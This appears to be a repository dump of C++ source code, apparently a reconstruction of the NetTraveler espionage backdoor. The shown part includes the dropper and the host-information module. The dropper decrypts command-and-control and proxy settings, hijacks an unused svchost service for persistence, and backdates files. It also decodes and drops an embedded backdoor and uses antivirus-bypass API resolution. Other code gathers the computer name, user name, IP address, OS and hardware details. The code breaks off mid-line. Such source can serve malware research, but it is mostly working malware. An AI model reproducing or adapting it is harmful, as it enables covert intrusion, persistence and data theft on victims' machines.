DEFAULT_CMD_DOWN_TIME 10 25 | #define DEFAULT_UPLOAD_RATE 128 26 | // ======== [END EASY COSTUMIZATION] ======== 27 | 28 | 29 | void CryptoString(char *szArray, int nLen); 30 | void CryptoBinary(BYTE *bArray, signed int nLen); 31 | 32 | BOOL SetupConfig() 33 | { 34 | CHAR szModuleName[MAX_PATH]; 35 | CHAR szWinDir[MAX_PATH]; 36 | CHAR szWebPage[MAX_PATH]; 37 | CHAR lpBuf128[128]; 38 | CHAR szConfigPath[MAX_PATH]; 39 | CHAR szProxy_IP[32]; 40 | CHAR szProxy_PSW[32]; 41 | CHAR szProxy_USER[32]; 42 | CHAR lpBuf32[32]; 43 | 44 | BYTE bAutoCheck = 0; 45 | BYTE bUseProxy = 0; 46 | 47 | WORD nProxy_UNK = 0; 48 | WORD nProxy_PORT = 0; 49 | WORD nDownCmdTime = 0; 50 | WORD nUploadRate = 0; 51 | 52 | 53 | // ================== OPEN CONFIG FILE ================== 54 | GetWindowsDirectory(szWinDir, MAX_PATH); 55 | sprintf(szConfigPath, "%s\\system\\" CONFIG_FILE_NAME, szWinDir); 56 | 57 | HANDLE hConfig = CreateFile(szConfigPath, 58 | GENERIC_READ | GENERIC_WRITE, 59 | FILE_SHARE_READ | FILE_SHARE_WRITE, 60 | NULL, 61 | CREATE_ALWAYS, 62 | FILE_ATTRIBUTE_NORMAL, 63 | NULL 64 | ); 65 | if (INVALID_HANDLE_VALUE == hConfig) 66 | return FALSE; 67 | 68 | CloseHandle(hConfig); 69 | 70 | 71 | // ================== RETRIEVE CONFIG ================== 72 | GetModuleFileName(NULL, szModuleName, MAX_PATH); 73 | 74 | FILE *f = fopen(szModuleName, "rb"); 75 | if (NULL == f) 76 | return FALSE; 77 | 78 | // ------------------ WEB PAGE ------------------ 79 | memset(lpBuf128, 0, 128); 80 | 81 | fseek(f, 688, 0); 82 | fread(lpBuf128, 1, 128, f); 83 | 84 | CryptoString(lpBuf128, 128); 85 | if (0 == strlen(lpBuf128)) 86 | return FALSE; 87 | 88 | memset(szWebPage, 0, MAX_PATH); 89 | sprintf(szWebPage, "%s", lpBuf128); 90 | 91 | // ------------------ DOWN CMD TIME ------------------ 92 | fseek(f, 816, 0); 93 | fread(&nDownCmdTime, 1, 2, f); 94 | 95 | if (nDownCmdTime <= 0) 96 | nDownCmdTime = DEFAULT_CMD_DOWN_TIME; 97 | 98 | // ------------------ UPLOAD RATE ------------------ 99 | fseek(f, 818, 0); 100 | fread(&nUploadRate, 1, 2, f); 101 | 102 | if (nUploadRate <= 0) 103 | nUploadRate = DEFAULT_UPLOAD_RATE; 104 | 105 | // ------------------ PROXY ------------------ 106 | fseek(f, 820, 0); 107 | fread(&bUseProxy, 1, 1, f); 108 | 109 | if (bUseProxy) 110 | { 111 | // ------------------ PROXY IP ------------------ 112 | memset(lpBuf32, 0, 32); 113 | 114 | fseek(f, 821, 0); 115 | fread(lpBuf32, 1, 32, f); 116 | 117 | CryptoString(lpBuf32, 32); 118 | if(0 == strlen(lpBuf32)) 119 | return FALSE; 120 | 121 | memset(szProxy_IP, 0, 32); 122 | sprintf(szProxy_IP, "%s", lpBuf32); 123 | 124 | // ------------------ PROXY PORT ------------------ 125 | fseek(f, 853, 0); 126 | fread(&nProxy_PORT, 1, 2, f); 127 | 128 | if((signed short)nProxy_PORT <= 0) 129 | return FALSE; 130 | 131 | // ------------------ PROXY USER ------------------ 132 | memset(lpBuf32, 0, 32); 133 | 134 | fseek(f, 855, 0); 135 | fread(lpBuf32, 1, 32, f); 136 | 137 | CryptoString(lpBuf32, 32); 138 | 139 | memset(szProxy_USER, 0, 32); 140 | sprintf(szProxy_USER, "%s", lpBuf32); 141 | 142 | // ------------------ PROXY PSW ------------------ 143 | memset(lpBuf32, 0, 32); 144 | 145 | fseek(f, 887, 0); 146 | fread(lpBuf32, 1, 32, f); 147 | 148 | CryptoString(lpBuf32, 32); 149 | 150 | memset(szProxy_PSW, 0, 32); 151 | sprintf(szProxy_PSW, "%s", lpBuf32); 152 | 153 | // ------------------ PROXY UNK ------------------ 154 | fseek(f, 919, 0); 155 | fread(&nProxy_UNK, 1, 2, f); 156 | 157 | if ((signed short)nProxy_UNK < 0) 158 | return FALSE; 159 | } 160 | 161 | // ------------------ AUTO CHECK ------------------ 162 | fseek(f, 921, 0); 163 | fread(&bAutoCheck, 1, 1, f); 164 | 165 | 166 | // ================== WRITE CONFIG ================== 167 | CHAR lpBuf4[4]; 168 | 169 | // ------------------ WEB PAGE ------------------ 170 | WritePrivateProfileString("Option", "WebPage", szWebPage, szConfigPath); 171 | 172 | // ------------------ DOWN CMD TIME ------------------ 173 | memset(lpBuf4, 0, 4); 174 | sprintf(lpBuf4, "%d", nDownCmdTime); 175 | WritePrivateProfileString("Option", "DownCmdTime", lpBuf4, szConfigPath); 176 | 177 | // ------------------ UPLOAD RATE ------------------ 178 | memset(lpBuf4, 0, 4); 179 | sprintf(lpBuf4, "%d", nUploadRate); 180 | WritePrivateProfileString("Option", "UploadRate", lpBuf4, szConfigPath); 181 | 182 | if (bUseProxy) 183 | { 184 | // ------------------ USE PROXY ENABLED ------------------ 185 | WritePrivateProfileString("Other", "UP", "1", szConfigPath); 186 | 187 | // ------------------ PROXY IP ------------------ 188 | WritePrivateProfileString("Other", "PS", szProxy_IP, szConfigPath); 189 | 190 | // ------------------ PROXY PORT ------------------ 191 | memset(lpBuf4, 0, 4); 192 | sprintf(lpBuf4, "%d", nProxy_PORT); 193 | WritePrivateProfileString("Other", "PP", lpBuf4, szConfigPath); 194 | 195 | // ------------------ PROXY USER ------------------ 196 | WritePrivateProfileString("Other", "PU", szProxy_USER, szConfigPath); 197 | 198 | // ------------------ PROXY PSW ------------------ 199 | WritePrivateProfileString("Other", "PW", szProxy_PSW, szConfigPath); 200 | 201 | // ------------------ PROXY UNK ------------------ 202 | memset(lpBuf4, 0, 4); 203 | sprintf(lpBuf4, "%d", nProxy_UNK); 204 | WritePrivateProfileString("Other", "PF", lpBuf4, szConfigPath); 205 | } 206 | else 207 | { 208 | // ------------------ USE PROXY DISABLED ------------------ 209 | WritePrivateProfileString("Other", "UP", "0", szConfigPath); 210 | } 211 | 212 | // ------------------ AUTO CHECK ------------------ 213 | WritePrivateProfileString("OtherTwo", "AutoCheck", bAutoCheck ? "1" : "0", szConfigPath); 214 | 215 | return TRUE; 216 | } 217 | 218 | void CryptoString(char *szArray, int nLen) 219 | { 220 | for (int i = 0; i < nLen; ++i) 221 | { 222 | BYTE bEnc = szArray[i]; 223 | if (bEnc) 224 | { 225 | bEnc ^= CRYPTO_STRING_KEY; 226 | szArray[i] = bEnc; 227 | } 228 | } 229 | } 230 | 231 | void Fast_RestartService(LPCSTR lpszServiceName) 232 | { 233 | SC_HANDLE hServiceMng = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE); 234 | if (NULL == hServiceMng) 235 | return; 236 | 237 | SC_HANDLE hService = OpenService(hServiceMng, lpszServiceName, DELETE | SERVICE_START); 238 | if (NULL == hService) 239 | return; 240 | 241 | char szStartService[16] = {}; 242 | AV_BYPASS__StartService(szStartService) 243 | 244 | __tStartService lpfnStartService = (__tStartService)GetProcAddress(LoadLibrary("advapi32.dll"), szStartService); 245 | lpfnStartService(hService, 0, NULL); 246 | 247 | CloseServiceHandle(hService); 248 | CloseServiceHandle(hServiceMng); 249 | } 250 | 251 | void DebugExceptionFilter(PEXCEPTION_POINTERS lpTopLevelExceptionFilter) 252 | { 253 | #ifdef _DEBUG 254 | CHAR szDebugString[1024]; 255 | PEXCEPTION_RECORD lpRecord = lpTopLevelExceptionFilter->ExceptionRecord; 256 | PCONTEXT lpContext = lpTopLevelExceptionFilter->ContextRecord; 257 | 258 | _snprintf(szDebugString, 259 | 1024, 260 | TEXT("Exception: Code %d, Flag %d, addr %p, param %d\n"), 261 | lpRecord->ExceptionCode, 262 | lpRecord->ExceptionFlags, 263 | lpRecord->ExceptionAddress, 264 | lpRecord->NumberParameters 265 | ); 266 | 267 | OutputDebugString(szDebugString); 268 | #endif // _DEBUG 269 | } 270 | 271 | LONG WINAPI TopLevelExceptionFilter(PEXCEPTION_POINTERS lpTopLevelExceptionFilter) 272 | { 273 | DebugExceptionFilter(lpTopLevelExceptionFilter); 274 | return EXCEPTION_CONTINUE_SEARCH; 275 | } 276 | 277 | char *SetupServiceEnvironment() 278 | { 279 | //void *lpBuf = alloca(208520); // UNUSED AND UNDELETED VARIABLE! 280 | //char *szSubKey[32] = "SOFTWARE\\Microsoft\\Windows NT\\"; // OVERFLOW! 281 | 282 | char szSubKey[64] = "SOFTWARE\\Microsoft\\Windows NT\\"; 283 | 284 | char *lpszServiceName = NULL; 285 | HKEY phkResult = NULL; 286 | SC_HANDLE hServiceMng = NULL; 287 | SC_HANDLE hService = NULL; 288 | 289 | strcat(szSubKey, "\\CurrentVersion\\Svchost"); 290 | 291 | try 292 | { 293 | // Get active services list 294 | HKEY hKey = HKEY_LOCAL_MACHINE; 295 | if (ERROR_SUCCESS != RegOpenKeyEx(hKey, szSubKey, 0, KEY_QUERY_VALUE, &hKey)) 296 | throw 0; 297 | 298 | DWORD dwError; 299 | DWORD dwType; 300 | DWORD dwLen = 1024; 301 | char lpBuf1024[1024]; 302 | 303 | dwError = RegQueryValueEx(hKey, "netsvcs", 0, &dwType, (LPBYTE)lpBuf1024, &dwLen); 304 | RegCloseKey(hKey); 305 | 306 | SetLastError(dwError); 307 | if (ERROR_SUCCESS != dwError) 308 | throw 0; 309 | 310 | hServiceMng = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); 311 | if (NULL == hServiceMng) 312 | throw 0; 313 | 314 | // Look for unused service (%sex.dll) and replace it (?) 315 | CHAR szSysDir[MAX_PATH]; 316 | GetSystemDirectory(szSysDir, MAX_PATH); 317 | 318 | CHAR szServicePath[MAX_PATH]; 319 | char *i; 320 | for (i = lpBuf1024; *i; i = strchr(i, '\0') + 1) 321 | { 322 | if (strcmp(i, "6to4")) 323 | { 324 | char szService[500]; 325 | wsprintf(szService, "SYSTEM\\CurrentControlSet\\Services\\%s", i); 326 | 327 | if (0 == RegOpenKeyEx(HKEY_LOCAL_MACHINE, szService, 0, KEY_QUERY_VALUE, &hKey)) 328 | { 329 | RegCloseKey(hKey); 330 | } 331 | else 332 | { 333 | memset(szServicePath, 0, MAX_PATH); 334 | wsprintf(szServicePath, "%s\\%sex.dll", szSysDir, i); 335 | 336 | DeleteFile(szServicePath); 337 | 338 | if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(szServicePath)) 339 | { 340 | __tCreateService lpfnCreateService; 341 | 342 | AV_BYPASS__CreateService(lpfnCreateService) 343 | hService = lpfnCreateService(hServiceMng, 344 | i, 345 | i, 346 | SERVICE_ALL_ACCESS , 347 | SERVICE_WIN32_SHARE_PROCESS, 348 | SERVICE_AUTO_START, 349 | SERVICE_ERROR_NORMAL, 350 | "%SystemRoot%\\System32\\svchost.exe -k netsvcs", 351 | NULL, 352 | NULL, 353 | NULL, 354 | NULL, 355 | NULL 356 | ); 357 | if (NULL != hService) 358 | break; 359 | } 360 | } 361 | } 362 | } 363 | 364 | if (NULL == hService) 365 | return 0; 366 | 367 | lpszServiceName = (char *)operator new(lstrlen(i) + 1); 368 | lstrcpy(lpszServiceName, i); 369 | 370 | if (NULL == hService) 371 | throw 0; 372 | 373 | CloseServiceHandle(hService); 374 | CloseServiceHandle(hServiceMng); 375 | 376 | // Setup service registry keys 377 | hKey = HKEY_LOCAL_MACHINE; 378 | 379 | strncpy(lpBuf1024, "SYSTEM\\CurrentControlSet\\Services\\", 1024); 380 | strncat(lpBuf1024, lpszServiceName, 100); 381 | 382 | if (RegOpenKeyEx(hKey, lpBuf1024, 0, KEY_ALL_ACCESS, &hKey)) 383 | throw 0; 384 | 385 | DWORD dwTypeValue = 288; 386 | Sleep(10); 387 | 388 | dwError = RegSetValueEx(hKey, "Type", 0, REG_DWORD, (LPBYTE)dwTypeValue, 4); 389 | SetLastError(dwError); 390 | if (dwError) 391 | throw 0; 392 | 393 | dwError = RegCreateKey(hKey, "Parameters", &phkResult); 394 | SetLastError(dwError); 395 | if (dwError) 396 | throw 0; 397 | 398 | // Write the batch file 399 | FILE *f = fopen(BATCH_FILE_NAME, "w"); 400 | 401 | char szBatchRegKeyCMD[512]; 402 | char szBatchCode[1024] = "@echo off\r\n"; 403 | strcat(szBatchCode, "\r\n"); 404 | sprintf(szBatchRegKeyCMD, 405 | "@reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d %s", 406 | lpszServiceName, 407 | szServicePath 408 | ); 409 | strcat(szBatchCode, szBatchRegKeyCMD); 410 | strcat(szBatchCode, "\r\n"); 411 | 412 | fwrite(szBatchCode, 1, strlen(szBatchCode), f); 413 | fclose(f); 414 | 415 | Sleep(10); 416 | 417 | // Execute the batch file 418 | __tWinExec lpfnWinExec; 419 | 420 | AV_BYPASS__WinExec(lpfnWinExec) 421 | lpfnWinExec(BATCH_FILE_NAME, 0); 422 | 423 | RegCloseKey(hKey); 424 | RegCloseKey(phkResult); 425 | 426 | CloseServiceHandle(hService); 427 | CloseServiceHandle(hServiceMng); 428 | 429 | if (NULL != lpszServiceName) 430 | { 431 | HANDLE hFile = CreateFile(szServicePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 432 | if (INVALID_HANDLE_VALUE != hFile) 433 | { 434 | // Set reliable file time (17/??/09 20:00) 435 | SYSTEMTIME lpSysTime = {}; 436 | 437 | lpSysTime.wYear = 2009; 438 | lpSysTime.wDay = 17; 439 | lpSysTime.wHour = 20; 440 | lpSysTime.wMinute = 0; 441 | 442 | FILETIME lpFileTime; 443 | FILETIME lpLocalFileTime; 444 | 445 | SystemTimeToFileTime(&lpSysTime, &lpFileTime); 446 | LocalFileTimeToFileTime(&lpFileTime, &lpLocalFileTime); 447 | 448 | __tSetFileTime lpfnSetFileTime; 449 | 450 | AV_BYPASS__SetFileTime(lpfnSetFileTime) 451 | lpfnSetFileTime(hFile, &lpLocalFileTime, NULL, &lpLocalFileTime); 452 | 453 | // Write the new executable 454 | BYTE bPlainBin[MAX_BINARY_DATA_LENGTH] = {}; 455 | DWORD dwWritten = 0; 456 | 457 | // Decode the backdoor 458 | memcpy(bPlainBin, g_lpBackdoor, sizeof(g_lpBackdoor)); 459 | CryptoBinary(bPlainBin, sizeof(g_lpBackdoor)); 460 | 461 | char szWriteFile[16] = {}; 462 | AV_BYPASS__WriteFile(szWriteFile) 463 | 464 | Sleep(10); 465 | 466 | __tWriteFile lpfnWriteFile = (__tWriteFile)GetProcAddress(LoadLibrary("kernel32.dll"), szWriteFile); 467 | lpfnWriteFile(hFile, bPlainBin, MAX_BINARY_DATA_LENGTH, &dwWritten, NULL); 468 | 469 | CloseHandle(hFile); 470 | } 471 | } 472 | } 473 | catch (int e) 474 | { 475 | #ifdef _DEBUG 476 | char szDebugLog[1024]; 477 | 478 | _snprintf(szDebugLog, 1024, TEXT("%s: Try failed with error code #%d\n"), __FUNCTION__, e); 479 | OutputDebugString(szDebugLog); 480 | #endif // _DEBUG 481 | } 482 | 483 | return lpszServiceName; 484 | } 485 | 486 | void CryptoBinary(BYTE *bArray, signed int nLen) 487 | { 488 | BYTE abKey[4] = CRYPTO_BINARY_KEY; 489 | for (int i = 0; i < nLen; ++i) 490 | { 491 | DWORD dw = i % nLen; 492 | BYTE b1 = (BYTE)(dw ^ (dw >> 8) ^ (BYTE)((dw >> 16) ^ abKey[i & 3])); 493 | BYTE b2 = bArray[i]; 494 | 495 | if (0 != b2 && b2 != b1) 496 | bArray[i] = b1 ^ b2; 497 | } 498 | } 499 | 500 | int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) 501 | { 502 | // Check for another NetTraveler already running 503 | HANDLE hInstallMutex = CreateMutex(NULL, TRUE, INSTALL_MUTEX_NAME); 504 | if (ERROR_ALREADY_EXISTS == GetLastError() || ERROR_ACCESS_DENIED == GetLastError()) 505 | return 0; 506 | 507 | if (FALSE == ReleaseMutex(hInstallMutex)) 508 | return 0; 509 | 510 | CloseHandle(hInstallMutex); 511 | 512 | if (FALSE == SetupConfig()) 513 | return 0; 514 | 515 | // Change the exection filter 516 | SetUnhandledExceptionFilter(TopLevelExceptionFilter); 517 | 518 | // Setup the environment of the service a start it 519 | const char *lpszServiceName = SetupServiceEnvironment(); 520 | 521 | Sleep(2000); 522 | DeleteFile(BATCH_FILE_NAME); 523 | 524 | if (NULL == lpszServiceName) 525 | return 0; 526 | 527 | Fast_RestartService(lpszServiceName); 528 | 529 | // Write the service name 530 | CHAR szWinDir[MAX_PATH]; 531 | CHAR szFileConf[MAX_PATH]; 532 | 533 | GetWindowsDirectory(szWinDir, MAX_PATH); 534 | wsprintf(szFileConf, "%s\\system\\" CONFIG_FILE_NAME, szWinDir); 535 | 536 | Sleep(10); 537 | WritePrivateProfileString("Option", "ServiceName", lpszServiceName, szFileConf); 538 | 539 | delete lpszServiceName; 540 | return 0; 541 | } -------------------------------------------------------------------------------- /open-backdoor/setup.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "setup.hpp" 6 | 7 | #include 8 | #include 9 | #include "StdAfx.hpp" 10 | #include "network_info.hpp" 11 | 12 | bool LoadConfig() 13 | { 14 | CHAR szConfigPath[260]; 15 | CHAR szWinDir[260]; 16 | 17 | GetWindowsDirectory(szWinDir, 260); 18 | sprintf(szConfigPath, "%s\\system\\config_t.dat", szWinDir); 19 | 20 | GetPrivateProfileString("Option", "WebPage", g_szBlank, g_szWebPage, 256, szConfigPath); 21 | 22 | g_nDownCmdTime = GetPrivateProfileInt("Option", "DownCmdTime", 0, szConfigPath); 23 | g_nUploadRate = GetPrivateProfileInt("Option", "UploadRate", 0, szConfigPath); 24 | g_dwMaxFileSizeKB = 10240; 25 | g_bAutoCheck = GetPrivateProfileInt("OtherTwo", "AutoCheck", 0, szConfigPath) == TRUE; 26 | g_bCheckedSuccess = GetPrivateProfileInt("OtherTwo", "CheckedSuccess", 0, szConfigPath) == TRUE; 27 | 28 | GetSystemDirectory(g_szSysDir, 260); 29 | sprintf(g_szStat_T, "%s\\stat_t.ini", g_szSysDir); 30 | sprintf(g_szDNList, "%s\\dnlist.ini", g_szSysDir); 31 | sprintf(g_szEnumFS, "%s\\enumfs.ini", g_szSysDir); 32 | sprintf(g_szUEnumFS, "%s\\uenumfs.ini", g_szSysDir); 33 | sprintf(g_szUDIdx, "%s\\udidx.ini", g_szSysDir); 34 | 35 | GetTempPath(260, g_szTmpPath); 36 | strcat(g_szTmpPath, "ntvba00.tmp\\"); 37 | 38 | return strcmp(g_szWebPage, g_szBlank) && g_nDownCmdTime && g_nUploadRate; 39 | } 40 | 41 | BOOL RemoveALL() 42 | { 43 | CHAR szConfigPath[260]; 44 | CHAR szWinDir[260]; 45 | CHAR szServiceName[260]; 46 | CHAR szSubKey[260]; 47 | 48 | memset(szServiceName, 0, 260); 49 | 50 | GetWindowsDirectory(szWinDir, 260); 51 | sprintf(szConfigPath, "%s\\system\\config_t.dat", szWinDir); 52 | 53 | GetPrivateProfileString("Option", "ServiceName", g_szBlank, szServiceName, 256, szConfigPath); 54 | 55 | sprintf(szSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Enum", szServiceName); 56 | RegDeleteKey(HKEY_LOCAL_MACHINE, szSubKey); 57 | 58 | sprintf(szSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", szServiceName); 59 | RegDeleteKey(HKEY_LOCAL_MACHINE, szSubKey); 60 | 61 | sprintf(szSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Security", szServiceName); 62 | RegDeleteKey(HKEY_LOCAL_MACHINE, szSubKey); 63 | 64 | sprintf(szSubKey, "SYSTEM\\CurrentControlSet\\Services\\"); 65 | strcat(szSubKey, szServiceName); 66 | RegDeleteKey(HKEY_LOCAL_MACHINE, szSubKey); 67 | 68 | DeleteFile(g_szEnumFS); 69 | DeleteFile(g_szDNList); 70 | DeleteFile(g_szUDIdx); 71 | DeleteFile(g_szUEnumFS); 72 | DeleteFile(g_szStat_T); 73 | 74 | return TRUE; 75 | } 76 | 77 | CHAR g_szPCName[32]; 78 | CHAR g_szUserName[32]; 79 | CHAR g_szOS[256]; 80 | CHAR g_szCPU[256]; 81 | CHAR g_szPHMemory[128]; 82 | CHAR g_szDiskSpace[128]; 83 | CHAR g_szIPAddress[132]; 84 | 85 | bool GetSystemTechnicalInfo(void) 86 | { 87 | CHAR szSysDir[260]; 88 | GetSystemDirectory(szSysDir, 260); 89 | 90 | CHAR szSystem_T[260]; 91 | sprintf(szSystem_T, "%s\\system_t.dll", szSysDir); 92 | 93 | // ------------------------- COMPUTER NAME ------------------------- 94 | DWORD nSize = 256; 95 | CHAR szPCName[256] = {}; 96 | if (!GetComputerName(szPCName, &nSize)) 97 | return false; 98 | 99 | g_szPCName[0] = 0; 100 | szPCName[nSize] = 0; 101 | 102 | strcat(g_szPCName, "computer: "); 103 | strcat(g_szPCName, szPCName); 104 | 105 | CHAR szLog[2048] = {}; 106 | sprintf(szLog, "[computerinfo]\r\n"); 107 | strcat(szLog, g_szPCName); 108 | strcat(szLog, "\r\n"); 109 | 110 | // ------------------------- USER NAME ------------------------- 111 | DWORD pcbBuffer = 256; 112 | CHAR szUserName[256] = {}; 113 | if (!GetUserName(szUserName, &pcbBuffer)) 114 | return false; 115 | 116 | g_szUserName[0] = 0; 117 | szUserName[pcbBuffer] = 0; 118 | 119 | strcat(g_szUserName, "username: "); 120 | strcat(g_szUserName, szUserName); 121 | strcat(szLog, g_szUserName); 122 | strcat(szLog, "\r\n"); 123 | 124 | // ------------------------- HOST INFO ------------------------- 125 | CHAR szIPAddr[128] = {}; 126 | CHAR szHostName[256] = {}; 127 | if (!GetHostInfo(szHostName, 256, szIPAddr)) 128 | return false; 129 | 130 | //char v15 = 0; // 1 - 4 bytes size 131 | g_szIPAddress[0] = 0; 132 | strcat(g_szIPAddress, "IPAddress: "); 133 | strcat(g_szIPAddress, szIPAddr); 134 | strcat(szLog, g_szIPAddress); 135 | strcat(szLog, "\r\n"); 136 | 137 | // ------------------------- OS INFO ------------------------- 138 | g_szOS[0] = 0; 139 | strcat(g_szOS, "OS: "); 140 | 141 | OSVERSIONINFO osInfo = {}; 142 | osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 143 | if(!GetVersionEx(&osInfo)) 144 | return false; 145 | 146 | if (osInfo.dwPlatformId == 1) 147 | { 148 | if (osInfo.dwMajorVersion == 4) 149 | { 150 | if (osInfo.dwMinorVersion == 0) 151 | { 152 | strcat(g_szOS, "Microsoft Windows 95 "); 153 | 154 | if (osInfo.szCSDVersion[1] == 'C' || osInfo.szCSDVersion[1] == 'B') 155 | strcat(g_szOS, "OSR2 "); 156 | } 157 | else if (osInfo.dwMinorVersion == 10) 158 | { 159 | strcat(g_szOS, "Microsoft Windows 98 "); 160 | 161 | if (osInfo.szCSDVersion[1] == 'A') 162 | strcat(g_szOS, "SE "); 163 | } 164 | else if (osInfo.dwMinorVersion == 90) 165 | { 166 | strcat(g_szOS, "Microsoft Windows Millennium Edition "); 167 | } 168 | } 169 | } 170 | else if(osInfo.dwPlatformId == 2) 171 | { 172 | if (osInfo.dwMajorVersion <= 4) 173 | { 174 | strcat(g_szOS, "Microsoft Windows NT "); 175 | } 176 | else if (osInfo.dwMajorVersion == 5) 177 | { 178 | if (osInfo.dwMinorVersion == 0) 179 | strcat(g_szOS, "Microsoft Windows 2000 "); 180 | else if (osInfo.dwMinorVersion == 1) 181 | strcat(g_szOS, "Microsoft Windows XP "); 182 | else if (osInfo.dwMinorVersion == 2) 183 | strcat(g_szOS, "Microsoft Windows 2003 "); 184 | } 185 | else if (osInfo.dwMajorVersion == 6) 186 | { 187 | if (osInfo.dwMinorVersion == 0) 188 | strcat(g_szOS, "Microsoft Windows Vista "); 189 | else if (osInfo.dwMinorVersion == 1) 190 | strcat(g_szOS, "Microsoft Windows7 "); 191 | else if (osInfo.dwMinorVersion == 2) 192 | strcat(g_szOS, "Microsoft Windows8 "); 193 | } 194 | 195 | CHAR szProductType[80]; 196 | DWORD cbData; 197 | HKEY hKey; 198 | 199 | RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\ProductOptions", 0, 1, &hKey); 200 | RegQueryValueEx(hKey, "ProductType", 0, 0, (LPBYTE)szProductType, &cbData); // CHECK THIS, cbData should be 80 201 | RegCloseKey(hKey); 202 | 203 | if (!lstrcmpi("WINNT", szProductType)) 204 | strcat(g_szOS, "Professional, "); 205 | 206 | if (!lstrcmpi("LANMANNT", szProductType)) 207 | strcat(g_szOS, "Server, "); 208 | 209 | if (!lstrcmpi("SERVERNT", szProductType)) 210 | strcat(g_szOS, "Advanced Server, "); 211 | 212 | CHAR szBuild[256]; 213 | if (osInfo.dwMajorVersion > 4) 214 | { 215 | sprintf(szBuild, "%s (Build %d)\n", osInfo.szCSDVersion, (WORD)osInfo.dwBuildNumber); 216 | strcat(g_szOS, szBuild); 217 | } 218 | else 219 | { 220 | sprintf(szBuild, 221 | "version %d.%d %s (Build %d)\n", 222 | osInfo.dwMajorVersion, 223 | osInfo.dwMinorVersion, 224 | osInfo.szCSDVersion, 225 | (WORD)osInfo.dwBuildNumber 226 | ); 227 | 228 | strcat(g_szOS, szBuild); 229 | } 230 | } 231 | 232 | strcat(szLog, g_szOS); 233 | strcat(szLog, "\r\n"); 234 | 235 | // ------------------------- DISK SPACE ------------------------- 236 | g_szDiskSpace[0] = 0; 237 | strcat(g_szDiskSpace, "Disk Space: "); 238 | 239 | unsigned long long v36 = 0; 240 | unsigned long long v34 = 0; 241 | 242 | DWORD cbData = GetLogicalDrives(); 243 | if (0 == cbData) 244 | return false; 245 | 246 | ULARGE_INTEGER FreeBytesAvailableToCaller; 247 | ULARGE_INTEGER TotalNumberOfBytes; 248 | ULARGE_INTEGER TotalNumberOfFreeBytes; 249 | 250 | for (char i = 0; i < 26; i++) 251 | { 252 | if (!(cbData >> i)) 253 | break; 254 | 255 | if ((cbData >> i) & 1) 256 | { 257 | char szDrive[4]; 258 | 259 | szDrive[1] = ':'; 260 | szDrive[2] = '\\'; 261 | szDrive[0] = i + 'A'; 262 | szDrive[3] = 0; 263 | 264 | if (GetDriveType(szDrive) == DRIVE_FIXED) 265 | { 266 | #ifndef NO_PATCH 267 | if (FALSE == GetDiskFreeSpaceEx(szDrive, &FreeBytesAvailableToCaller, &TotalNumberOfBytes, &TotalNumberOfFreeBytes)) 268 | continue; 269 | #else // NO_PATCH 270 | if (FALSE == GetDiskFreeSpaceEx(szDrive, &FreeBytesAvailableToCaller, &TotalNumberOfBytes, &TotalNumberOfFreeBytes)) 271 | return false; // If one or more disks are inaccessible we should just skip them 272 | #endif // NO_PATCH 273 | 274 | v36 += *(unsigned long long *)&TotalNumberOfBytes; 275 | v34 += *(unsigned long long *)&TotalNumberOfFreeBytes; 276 | } 277 | } 278 | } 279 | 280 | v34 /= 0x40000000; 281 | v36 /= 0x40000000; 282 | 283 | CHAR szTotalSpace[64]; 284 | CHAR szLeftSpace[64]; 285 | CHAR szFor[64]; 286 | 287 | sprintf(szTotalSpace, "total space:%lldGB,", v36); 288 | sprintf(szLeftSpace, "left space%lldGB", v34); 289 | sprintf(szFor, "(for%.2f%c)", (double)v34 / (double)v36 * 100.0, '%'); 290 | 291 | strcat(g_szDiskSpace, szTotalSpace); 292 | strcat(g_szDiskSpace, szLeftSpace); 293 | strcat(g_szDiskSpace, szFor); 294 | 295 | strcat(szLog, g_szDiskSpace); 296 | strcat(szLog, "\r\n"); 297 | 298 | // ------------------------- CPU INFO ------------------------- 299 | g_szCPU[0] = 0; 300 | strcat(g_szCPU, "CPU: "); 301 | 302 | HKEY phkResult; 303 | CHAR szValue[80]; 304 | DWORD dwKeySize = 80; 305 | 306 | RegOpenKeyEx(HKEY_LOCAL_MACHINE, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 1u, &phkResult); 307 | RegQueryValueEx(phkResult, "VendorIdentifier", 0, 0, (LPBYTE)szValue, &dwKeySize); 308 | 309 | szValue[dwKeySize] = 0; 310 | 311 | strcat(g_szCPU, szValue); 312 | strcat(g_szCPU, " "); 313 | 314 | memset(szValue, 0, 80); 315 | 316 | dwKeySize = 80; 317 | RegQueryValueEx(phkResult, "Identifier", 0, 0, (LPBYTE)szValue, &dwKeySize); 318 | 319 | szValue[dwKeySize] = 0; 320 | 321 | strcat(g_szCPU, szValue); 322 | 323 | int nMHz; 324 | dwKeySize = 8; 325 | RegQueryValueEx(phkResult, "~MHz", 0, 0, (LPBYTE)&nMHz, &dwKeySize); 326 | 327 | CHAR szMHz[12]; 328 | sprintf(szMHz, " %dMHZ", nMHz); 329 | strcat(g_szCPU, szMHz); 330 | 331 | RegCloseKey(phkResult); 332 | 333 | strcat(szLog, g_szCPU); 334 | strcat(szLog, "\r\n"); 335 | 336 | // ------------------------- MEMORY INFO ------------------------- 337 | MEMORYSTATUS memStatus; 338 | GlobalMemoryStatus(&memStatus); 339 | 340 | //v36 = memStatus.dwTotalPhys; 341 | double v0 = (double)memStatus.dwAvailPhys / (double)memStatus.dwTotalPhys * 100.0; 342 | 343 | CHAR szPHMemory[256]; 344 | sprintf(szPHMemory, 345 | "PHMemory: Total Memory:%dMB,Empty 